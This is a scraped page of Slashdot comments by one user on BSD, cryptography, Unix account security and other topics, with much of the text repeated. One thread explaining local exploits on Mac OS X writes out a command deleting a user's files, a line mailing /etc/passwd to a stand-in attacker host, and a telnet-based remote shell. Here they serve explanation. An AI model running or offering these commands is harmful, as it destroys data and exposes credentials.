For the record, I'm using FreeBSD with Konqueror and Mozilla.
Try clicking those links at the bottom of the page. You can't get to ``Terms of Use,'' but ``Advertise'' works just fine.
b&
Don't be a zealot.
on
Selling BSD
·
· Score: 4, Insightful
Mr. Lucas makes an excellent point: just because you might have the superior technical solution--one that would be everything the company needs and cost no money--it won't do you much good if The Powers That Be have closed minds.
Opening closed minds takes a looong time. Dont' try to do everything all at once, and don't nag while you're doing it.
I'm surprised nobody's yet mentioned union mounts, at least available in OpenBSD and FreeBSD.
The classical use for a union filesystem is to make a CD-ROM appear to be read-write. You mount the CD and then mount another partion on top of it with the union option. Any changes are made to the union-mounted partition.
The underlying filesystem doesn't have to be a CD-ROM, of course. Your problem could be quite easily solved with three disk partitions: two large enough to hold everything, and one large enough to hold the changes.
Start by mounting one of the large partitions and then union mounting the smaller one on top of it. If you need to roll back, simply unmount and newfs the union partition. When you want to commit, assume that wd1c and wd2c are your large partitions and wd3c is your small partition and do something like:
was able to load all 6500 of my MP3s on my home network in just a few minutes.
Since we know that all MP3s are only backup copies of what we have already purchased, I'm sure that Taco actually paid for all that music and the musicians were properly paid for their effort.:)
I'll believe him on this one...but, figuring about fifteen tracks per CD, and about fifteen dollars per CD, we also know that Taco has given the RIAA about $6500 dollars.
Not counting, of course, the CDs he has yet to rip.
And we wonder where they get the money and power to ram through the DMCA and SSSCA....
First, as others have noted, this is just another beta.
Having said that, if you want to get the sources, stop Slashdotting openoffice.org and get it from Akamai. At least they've got the bandwidth to deal with the load.
Something I just thought of a little while ago, to help me gain some perspective on what happened:
A Boeing 767-400ER [boeing.com] has a maximum takeoff mass of a shade more than 200,000 kg. It has a typical cruise speed of 840 km/h.
Using our favorite formula for kinetic energy, that comes to about 5.6 billion Joules, or between one and two tons of TNT.
Or, in other words, just the force of that much mass at that speed is about the same as a WWII blockbuster bomb. Add in some twenty thousand gallons of jet fuel...and I still can't wrap my mind around that much destructive force.
And I thought cars on the freeway were deadly!
May such magnificient machines never again be used for such awful, awful purpose.
I wasn't aware that Mac OS X uses netinfo...but I'm sure a ``wanabee cracker'' would, considering this is an OS X-specific attack.
> And run something on port 666 on attacker.com that gives attacker.com shell access.
Mmmm. You mix things there. telneting to port 666 on attacker.com won't help you running anything on local port 666. man inetd is your friend, here.
Ah...you misunderstand me. The exploit program on the attacked machine has full access to that machine as the user who downloaded it. The program starts a shell, connects to attacker.com, and redirects I/O so that incoming packets from attacker.com are passed to the shell's stdin, and stdout and sterr are sent to attacker.com. Voila! Remote shell, initiated locally.
A good firewall, including use of proxy servers, would protect you from this particular scenario (which is why that's how I have things set up on my own network), but little else will.
If mass destruction is your aim, then the following will do the job nicely:
find / -user $USER -exec rm -f {} \;
Or, you could:
mail badguy@attacker.com </etc/passwd
Maybe it'd be a program to brute-force su, something often possible (brute-forcing ssh or telnet usually isn't.
With a bit more work, you could:
telnet attacker.com 666
And run something on port 666 on attacker.com that gives attacker.com shell access.
All this assumes the rest of the operating system's security is iron-clad. Local exploits are, in general, much easier to pull off than remote ones. Account compromise is not a nice thing, at all.
...to ``protect'' children from being ``harmed'' by the sight of naked people having sex is not by passing laws.
It's by parents putting the computer in the living room.
Children are required to show ID before they can purchase a copy of ``Playboy'' or whatever because they can enter stores where pornography is sold without being accompanied by a responsible adult.
In the home, many adults have access to pornography through cable TV, videos, or copies of ``Playboy,'' or other means. Parents who don't want their children to see pornography on TV should be monitoring and restricting their children's access to TV--but they should be doing that anyway. If they can't lock out channels, they should lock up the remote with the VHS stash.
Parents who don't want children calling 1-900-LIVE-SEX should have the phone company block 900 numbers, or pay attention to their phone bills.
Parents who are really paranoid about the matter should know what kind of pornography exists in their children's friends' homes before allowing visits.
The computer should be treated no differently. You don't want your children surfing over to www.hotsexyteenlesbians.com? Fine, do it the same way you keep your children from all the rest of the pornography in the world.
And maybe, just maybe, recognize that children are also sexual beings. Talk with them about sex (in an age-appropriate manner, of course), relationships, pregnancy and parenthood, love, STDs, marriage, committment, and what it all means to you.
Or, in other words, parents being parents and legislators making laws is good; parents making laws and legislators being parents is bad.
We've been hearing about adding crypto back doors for the govement to snoop on us, but how would they work? Would there be one key that could be cracked opening up all such traffic?
If you're talking about public key cryptography or some form of key exchange protocol (such as what happens with PGP, SSL, and the like), then, yes, there'll be more than one key that can decrypt the message. PGP already allows you to encrypt a message to more than one recipient; a simple solution would be to require all software to always encrypt to Uncle Sam's key in addition to the intended recipients.
The other solution is to weaken the encryption algorithm in some way. There are very subtle approaches, but the simplest is to limit the length of the key. A 40-bit key takes half as long to crack with brute force as a 41-bit key, and a 42-bit key takes twice as long again (all else being equal). If you have an application that uses 128-bit keys, it could be ``dumbed down'' to a 40-bit key by forcing all keys to start with 88 zeroes (or some other known pattern).
How to get people to use such software when there's a wealth of reliable strong cryptographic software readily available is left as an exercise to the reader.
Also, how would/does the government know wether a bitstream is random bits, or encrypted data?"
Most encrypted streams have header information to make identifaction easy for the recipient. If you've ever gotten PGP-signed or -encrypted email, you've seen ``BEGIN PGP MESSAGE'' or some such at the top.
You could, of course, remove all such identification. If the encryption method is strong, what remains is provably indistinguishable from pure noise. If the recipient adds the identifaction back--if she puts ``BEGIN PGP MESSAGE'' before the bits--the result can be fed to the decryption proces without trouble.
But how many people send random bitstreams to each other? Somebody doing so would stand out like a sore thumb against the usual traffic of ASCII.
The most commonly accepted solution is steganography, the art of hiding secrets in plain sight. ``All the twenty clever kings'' could mean ``attack'' if you were to just look at the first letter of every word. Common modern methods of steganography include encoding the message in the low-order bits of a JPEG, but the field is still young and many techniques a bit crude. If ``they'' are already looking at you, ``they'' will have a good chance of finding the message.
As always, Bruce Scnhier's Applied Cryptography is a wonderful resource.
b&
K.E. = .5 * m * v * v
on
More On Tragedy
·
· Score: 4, Informative
Something I just thought of a little while ago, to help me gain some perspective on what happened:
A Boeing 767-400ER has a maximum takeoff mass of a shade more than 200,000 kg. It has a typical cruise speed of 840 km/h.
Using our favorite formula for kinetic energy, that comes to about 5.6 billion Joules, or between one and two tons of TNT.
Or, in other words, just the force of that much mass at that speed is about the same as a WWII blockbuster bomb. Add in some twenty thousand gallons of jet fuel...and I still can't wrap my mind around that much destructive force.
And I thought cars on the freeway were deadly!
May such magnificient machines never again be used for such awful, awful purpose.
Does nothing well. Look at the combination server/desktop platform our friends in Redmond have. (I'm not talking Nintendo, either.) It can't even keep a simple messaging service running.
I have moderator access at the moment, and was quite tempted to add to the ``troll'' moderation you've already recieved, but I've decided to reply, instead. I'm not into wasting mod points on games of mod-the-troll.
FOLK is good for one thing, and one thing only: experimentation. And it does that thing extraordinarily well.
They make no pretenses that this is anything you'd actually want to use for anything serious. But, if you want to play around with the bleeding edge, you don't have to forge your own knife any more.
Your always going to risk loss of data and loss of service if you let someone else handle your data, communications, authorization, etc.
True, but you also take the risk if you handle your own data. Most people don't make backups, and far too many of those who do have never tested them. What good is it to make a backup if you can't use it to recover from a disaster?
Microsoft's data loss in this case is inexcuseable, and reason enough why anybody considering a move to Microsoft-hosted services for anything of any importance should instead run screaming to the hills.
But! Most people would still be taking less of a risk of data loss by trusting their data to Microsoft than taking care of it themselves.
The answer is to control your own data only if you have the expertise and equipment to do so. If you don't, then hire somebody who does.
Microsoft has, yet again, demonstrated that they don't.
There's a common misconception out there that nobody has some special super-unpriveleged status. That's not the case; nobody is no different from any other account.
The user/group nobody should only be used as it was originally intended, to limit access with UUCP. If you're not using UUCP on your system, you should be able to remove nobody and the system shouldn't even know the difference.
If you make something suid or sgid nobody, then you're giving that something and anybody/anything that runs it access to important parts of your UUCP subsystem, if said sybsystem exists.
If you make two things suid or sgid nobody, you're giving both access to UUCP and you're giving them access to each other.
If you make both your Web server and your database server run as nobody, then nobody has become almost as powerful as root! Run unknown foreign executables as nobody as well, and you'll deserve what you get.
People, please don't use nobody for anything. Instead, create a new account just for that one special purpose. Your Web server should run as user httpd (or www or whatever you choose). Your datbase server should run as user mysql (or whatever). Your name server should run as named. If one gets compromised, it only has access to that one subsystem (though, granted, even that can be tragic).
For what it's worth, OpenBSD has no files or directories owned by either user or group nobody, though a few things do run as user nobody (such as the cron job to update the locate database and the fingerd and identd daemons).
For example FreeBSD has kernel secure levels (-1, 0, 1 etc) that you can set to decide how secure you would like your kernel to operate, for example on higher security levels you can not open up/dev/mem or/dev/kmem for writing and other things, while on lower security levels you can do pretty much what a regulat OpenBSD or NetBSD can do by default.
It's also best to remember that security is not a feature set, but rather a process and a frame of mind. OpenBSD is designed to give you a platform which gives you a good start for your security process. An OpenBSD system can be made very insecure, and most any other operating system can be made very secure. One of OpenBSD's goals, however, is to make security a bit easier.
Besides, should TrustedBSD turn out to be something worthwhile--and it's rather likely it will--there's an excellent chance it'll find its way into the other BSDs. There's a heck of a lot of cross-polination that goes on in the BSD world.
FreeBSD is very well suited to this kind of research. The other BSDs will benefit, just as all have benefited from OpenSSH, NetBSD's ports....
The communication doesn't have to travel via satellite. The satellite is just used to exchange keys.
Or, in other words, this solves the same problem as RSA and D-H key exchange techniques. Once both sides have agreed on keys, you could use carrier pigeons for the actual excrypted data transmission.
Obviously, most people won't put up with the hassle, but I've taken to using the GNU Keyring for PalmOS. It stores everything with 3DES and will generate random passwords for you. All I really have to remember is the one password to unlock it. You might think that (in my case) a twelve-character strong random mixed-case alphanumeric password would be hard to remember, but I enter it so many times a day it's easier if I don't think about it.
...and keep the result in my wallet. I figured that, if my wallet got lost or stolen, I was screwed anyway, and loosing the passwords would be the least of my worries.
If you don't like the service that Microsoft is offering--that is, if you want POP3 access and they won't give it to you--then don't use their service.
Sheesh, it's not like Microsoft already has a monopoly on email.
So you got a year's free access, and you feel you have to use it? If your computer came with a year's supply of dog food, would you eat it just because you don't have a dog?
...it's about the artist. The computer is just a different kind of brush.
New tools have always been met with controversy. The organ caused as much of an uproar as the Moog synthesizer; both are now celebrated. Photography wasn't considered an art until after people realized that it truly is an artistic medium.
Real Artists(tm) will understand that what you do with/on the computer needs to be evaluated based on its artistic merits, without prejudice based upon the tools you used to create it.
um - no. Go read what Freedom REALLY is. The main feature is that nobody can connect your nym to you - NOT EVEN ZKS. Thats the whole point. Even they can't track you.
And who's to say that the same level of anonymity couldn't be implemented without ZKS? It's not like they're the only ones with skills in the field of cryptography.
The basic idea behind Zero Knowledge's Freedom project is that your traffic gets pooled (in a cryptographically secure manner) with that of the rest of their customers in such a way that all anybody (but ZKS) can discover is that one of their customers is doing something.
It would seem to me that a cooperative group of people could accomplish much the same without too much trouble: set up an IPSEC WAN and a bunch of proxy servers that only speak to clients on the private side of the network. Use DNS load balancing, and all you know is that a request is coming from a participant of the WAN.
ZKS also offers psuedononymous email, web server profiles, newsgroups posting, etc--all very good. But there's no reason the cooperative couldn't provide similar functions.
ZKS runs the servers that do all the heavy lifting. In the cooperative, all the members would provide a piece of the heavy lifting.
Yes, I'm painting with a broad brush here, and even I could start to pick holes in the way I phrased some of all this. But, I think the basic idea is sound: rather than rely on a company like ZKS to do everything, have everybody chip in, even if it's just to share some bandwidth and CPU cycles. Surely if we can all cooperate sufficiently to create a number of operating systems--even if the form of cooperation is nothing more than using them--we can also cooperate to protect our privacy?
Slashdot Mirror
For the record, I'm using FreeBSD with Konqueror and Mozilla.
Try clicking those links at the bottom of the page. You can't get to ``Terms of Use,'' but ``Advertise'' works just fine.
b&
Mr. Lucas makes an excellent point: just because you might have the superior technical solution--one that would be everything the company needs and cost no money--it won't do you much good if The Powers That Be have closed minds.
Opening closed minds takes a looong time. Dont' try to do everything all at once, and don't nag while you're doing it.
b&
I'm surprised nobody's yet mentioned union mounts, at least available in OpenBSD and FreeBSD.
The classical use for a union filesystem is to make a CD-ROM appear to be read-write. You mount the CD and then mount another partion on top of it with the union option. Any changes are made to the union-mounted partition.
The underlying filesystem doesn't have to be a CD-ROM, of course. Your problem could be quite easily solved with three disk partitions: two large enough to hold everything, and one large enough to hold the changes.
Start by mounting one of the large partitions and then union mounting the smaller one on top of it. If you need to roll back, simply unmount and newfs the union partition. When you want to commit, assume that wd1c and wd2c are your large partitions and wd3c is your small partition and do something like:
As an added bonus, the union-mounted filesystem can be mounted normally later and you only see the modified files.
Of course, if you're working with really large filesystems and time is critical, this is likely to be too slow for you.
b&
I'll believe him on this one...but, figuring about fifteen tracks per CD, and about fifteen dollars per CD, we also know that Taco has given the RIAA about $6500 dollars.
Not counting, of course, the CDs he has yet to rip.
And we wonder where they get the money and power to ram through the DMCA and SSSCA....
b&
First, as others have noted, this is just another beta.
Having said that, if you want to get the sources, stop Slashdotting openoffice.org and get it from Akamai. At least they've got the bandwidth to deal with the load.
b&
I wrote about this the day after the attack:
Something I just thought of a little while ago, to help me gain some perspective on what happened:
A Boeing 767-400ER [boeing.com] has a maximum takeoff mass of a shade more than 200,000 kg. It has a typical cruise speed of 840 km/h.
Using our favorite formula for kinetic energy, that comes to about 5.6 billion Joules, or between one and two tons of TNT.
Or, in other words, just the force of that much mass at that speed is about the same as a WWII blockbuster bomb. Add in some twenty thousand gallons of jet fuel...and I still can't wrap my mind around that much destructive force.
And I thought cars on the freeway were deadly!
May such magnificient machines never again be used for such awful, awful purpose.
b&
I wasn't aware that Mac OS X uses netinfo...but I'm sure a ``wanabee cracker'' would, considering this is an OS X-specific attack.
Ah...you misunderstand me. The exploit program on the attacked machine has full access to that machine as the user who downloaded it. The program starts a shell, connects to attacker.com, and redirects I/O so that incoming packets from attacker.com are passed to the shell's stdin, and stdout and sterr are sent to attacker.com. Voila! Remote shell, initiated locally.
A good firewall, including use of proxy servers, would protect you from this particular scenario (which is why that's how I have things set up on my own network), but little else will.
Yours,
b&
If mass destruction is your aim, then the following will do the job nicely:
Or, you could:
Maybe it'd be a program to brute-force su, something often possible (brute-forcing ssh or telnet usually isn't.
With a bit more work, you could:
And run something on port 666 on attacker.com that gives attacker.com shell access.
All this assumes the rest of the operating system's security is iron-clad. Local exploits are, in general, much easier to pull off than remote ones. Account compromise is not a nice thing, at all.
b&
...to ``protect'' children from being ``harmed'' by the sight of naked people having sex is not by passing laws.
It's by parents putting the computer in the living room.
Children are required to show ID before they can purchase a copy of ``Playboy'' or whatever because they can enter stores where pornography is sold without being accompanied by a responsible adult.
In the home, many adults have access to pornography through cable TV, videos, or copies of ``Playboy,'' or other means. Parents who don't want their children to see pornography on TV should be monitoring and restricting their children's access to TV--but they should be doing that anyway. If they can't lock out channels, they should lock up the remote with the VHS stash.
Parents who don't want children calling 1-900-LIVE-SEX should have the phone company block 900 numbers, or pay attention to their phone bills.
Parents who are really paranoid about the matter should know what kind of pornography exists in their children's friends' homes before allowing visits.
The computer should be treated no differently. You don't want your children surfing over to www.hotsexyteenlesbians.com? Fine, do it the same way you keep your children from all the rest of the pornography in the world.
And maybe, just maybe, recognize that children are also sexual beings. Talk with them about sex (in an age-appropriate manner, of course), relationships, pregnancy and parenthood, love, STDs, marriage, committment, and what it all means to you.
Or, in other words, parents being parents and legislators making laws is good; parents making laws and legislators being parents is bad.
b&;
If you're talking about public key cryptography or some form of key exchange protocol (such as what happens with PGP, SSL, and the like), then, yes, there'll be more than one key that can decrypt the message. PGP already allows you to encrypt a message to more than one recipient; a simple solution would be to require all software to always encrypt to Uncle Sam's key in addition to the intended recipients.
The other solution is to weaken the encryption algorithm in some way. There are very subtle approaches, but the simplest is to limit the length of the key. A 40-bit key takes half as long to crack with brute force as a 41-bit key, and a 42-bit key takes twice as long again (all else being equal). If you have an application that uses 128-bit keys, it could be ``dumbed down'' to a 40-bit key by forcing all keys to start with 88 zeroes (or some other known pattern).
How to get people to use such software when there's a wealth of reliable strong cryptographic software readily available is left as an exercise to the reader.
Most encrypted streams have header information to make identifaction easy for the recipient. If you've ever gotten PGP-signed or -encrypted email, you've seen ``BEGIN PGP MESSAGE'' or some such at the top.
You could, of course, remove all such identification. If the encryption method is strong, what remains is provably indistinguishable from pure noise. If the recipient adds the identifaction back--if she puts ``BEGIN PGP MESSAGE'' before the bits--the result can be fed to the decryption proces without trouble.
But how many people send random bitstreams to each other? Somebody doing so would stand out like a sore thumb against the usual traffic of ASCII.
The most commonly accepted solution is steganography, the art of hiding secrets in plain sight. ``All the twenty clever kings'' could mean ``attack'' if you were to just look at the first letter of every word. Common modern methods of steganography include encoding the message in the low-order bits of a JPEG, but the field is still young and many techniques a bit crude. If ``they'' are already looking at you, ``they'' will have a good chance of finding the message.
As always, Bruce Scnhier's Applied Cryptography is a wonderful resource.
b&
Something I just thought of a little while ago, to help me gain some perspective on what happened:
A Boeing 767-400ER has a maximum takeoff mass of a shade more than 200,000 kg. It has a typical cruise speed of 840 km/h.
Using our favorite formula for kinetic energy, that comes to about 5.6 billion Joules, or between one and two tons of TNT.
Or, in other words, just the force of that much mass at that speed is about the same as a WWII blockbuster bomb. Add in some twenty thousand gallons of jet fuel...and I still can't wrap my mind around that much destructive force.
And I thought cars on the freeway were deadly!
May such magnificient machines never again be used for such awful, awful purpose.
b&
That must explain why people keep sending me all these files that end in .doc, .xls, .ppt....
b&
Blockquoth bonzoesc:
I have moderator access at the moment, and was quite tempted to add to the ``troll'' moderation you've already recieved, but I've decided to reply, instead. I'm not into wasting mod points on games of mod-the-troll.
FOLK is good for one thing, and one thing only: experimentation. And it does that thing extraordinarily well.
They make no pretenses that this is anything you'd actually want to use for anything serious. But, if you want to play around with the bleeding edge, you don't have to forge your own knife any more.
b&
Blockquoth Traicovn:
True, but you also take the risk if you handle your own data. Most people don't make backups, and far too many of those who do have never tested them. What good is it to make a backup if you can't use it to recover from a disaster?
Microsoft's data loss in this case is inexcuseable, and reason enough why anybody considering a move to Microsoft-hosted services for anything of any importance should instead run screaming to the hills.
But! Most people would still be taking less of a risk of data loss by trusting their data to Microsoft than taking care of it themselves.
The answer is to control your own data only if you have the expertise and equipment to do so. If you don't, then hire somebody who does.
Microsoft has, yet again, demonstrated that they don't.
b&
Blockquoth navindra:
Ack! No!
There's a common misconception out there that nobody has some special super-unpriveleged status. That's not the case; nobody is no different from any other account.
The user/group nobody should only be used as it was originally intended, to limit access with UUCP. If you're not using UUCP on your system, you should be able to remove nobody and the system shouldn't even know the difference.
If you make something suid or sgid nobody, then you're giving that something and anybody/anything that runs it access to important parts of your UUCP subsystem, if said sybsystem exists.
If you make two things suid or sgid nobody, you're giving both access to UUCP and you're giving them access to each other.
If you make both your Web server and your database server run as nobody, then nobody has become almost as powerful as root! Run unknown foreign executables as nobody as well, and you'll deserve what you get.
People, please don't use nobody for anything. Instead, create a new account just for that one special purpose. Your Web server should run as user httpd (or www or whatever you choose). Your datbase server should run as user mysql (or whatever). Your name server should run as named. If one gets compromised, it only has access to that one subsystem (though, granted, even that can be tragic).
For what it's worth, OpenBSD has no files or directories owned by either user or group nobody, though a few things do run as user nobody (such as the cron job to update the locate database and the fingerd and identd daemons).
b&
Blockqoth the AC, AKA Lional Will:
Ahem. OpenBSD has runlevels.
It's also best to remember that security is not a feature set, but rather a process and a frame of mind. OpenBSD is designed to give you a platform which gives you a good start for your security process. An OpenBSD system can be made very insecure, and most any other operating system can be made very secure. One of OpenBSD's goals, however, is to make security a bit easier.
Besides, should TrustedBSD turn out to be something worthwhile--and it's rather likely it will--there's an excellent chance it'll find its way into the other BSDs. There's a heck of a lot of cross-polination that goes on in the BSD world.
FreeBSD is very well suited to this kind of research. The other BSDs will benefit, just as all have benefited from OpenSSH, NetBSD's ports....
b&
The communication doesn't have to travel via satellite. The satellite is just used to exchange keys.
Or, in other words, this solves the same problem as RSA and D-H key exchange techniques. Once both sides have agreed on keys, you could use carrier pigeons for the actual excrypted data transmission.
b&
Obviously, most people won't put up with the hassle, but I've taken to using the GNU Keyring for PalmOS. It stores everything with 3DES and will generate random passwords for you. All I really have to remember is the one password to unlock it. You might think that (in my case) a twelve-character strong random mixed-case alphanumeric password would be hard to remember, but I enter it so many times a day it's easier if I don't think about it.
Before that, I would use something like this:
...and keep the result in my wallet. I figured that, if my wallet got lost or stolen, I was screwed anyway, and loosing the passwords would be the least of my worries.
b&
If you don't like the service that Microsoft is offering--that is, if you want POP3 access and they won't give it to you--then don't use their service.
Sheesh, it's not like Microsoft already has a monopoly on email.
So you got a year's free access, and you feel you have to use it? If your computer came with a year's supply of dog food, would you eat it just because you don't have a dog?
b&
As I write this, the fortune at the bottom of the page reads:
So, not only is somebody alseep at the wheel, that somebody also thinks he's a clown.
(Yeah, I know the fortune is random.)
b&
...it's about the artist. The computer is just a different kind of brush.
New tools have always been met with controversy. The organ caused as much of an uproar as the Moog synthesizer; both are now celebrated. Photography wasn't considered an art until after people realized that it truly is an artistic medium.
Real Artists(tm) will understand that what you do with/on the computer needs to be evaluated based on its artistic merits, without prejudice based upon the tools you used to create it.
b&
Honestly, I don't understand what all the fuss is about.
Unless you're the kind who likes to pay for water, just use one of the many other Linux distributions out there that don't have such odious licensing terms. It's not like there aren't any alternatives out there.
Or, better, you can use something with no restrictions at all on how you use it.
If Caldera wants to shoot themselves in the foot, who are we to stop them?
b&
Blockquoth the AC:
And who's to say that the same level of anonymity couldn't be implemented without ZKS? It's not like they're the only ones with skills in the field of cryptography.
b&
The basic idea behind Zero Knowledge's Freedom project is that your traffic gets pooled (in a cryptographically secure manner) with that of the rest of their customers in such a way that all anybody (but ZKS) can discover is that one of their customers is doing something.
It would seem to me that a cooperative group of people could accomplish much the same without too much trouble: set up an IPSEC WAN and a bunch of proxy servers that only speak to clients on the private side of the network. Use DNS load balancing, and all you know is that a request is coming from a participant of the WAN.
ZKS also offers psuedononymous email, web server profiles, newsgroups posting, etc--all very good. But there's no reason the cooperative couldn't provide similar functions.
ZKS runs the servers that do all the heavy lifting. In the cooperative, all the members would provide a piece of the heavy lifting.
Yes, I'm painting with a broad brush here, and even I could start to pick holes in the way I phrased some of all this. But, I think the basic idea is sound: rather than rely on a company like ZKS to do everything, have everybody chip in, even if it's just to share some bandwidth and CPU cycles. Surely if we can all cooperate sufficiently to create a number of operating systems--even if the form of cooperation is nothing more than using them--we can also cooperate to protect our privacy?
b&
The article says that the drive is $250; 10 Gbyte disks are $160; and 20 Gbyte disks are $200.
Now, why should I spend that much when the lowest price for a 10 Gbyte external USB drive on Pricewatchis $141, and a 20 Gbyte is $168?
C'mon, the form factor can't be worth that much, now, can it? Especially considering it's ``roughly the size of a handheld computer or PDA.''
b&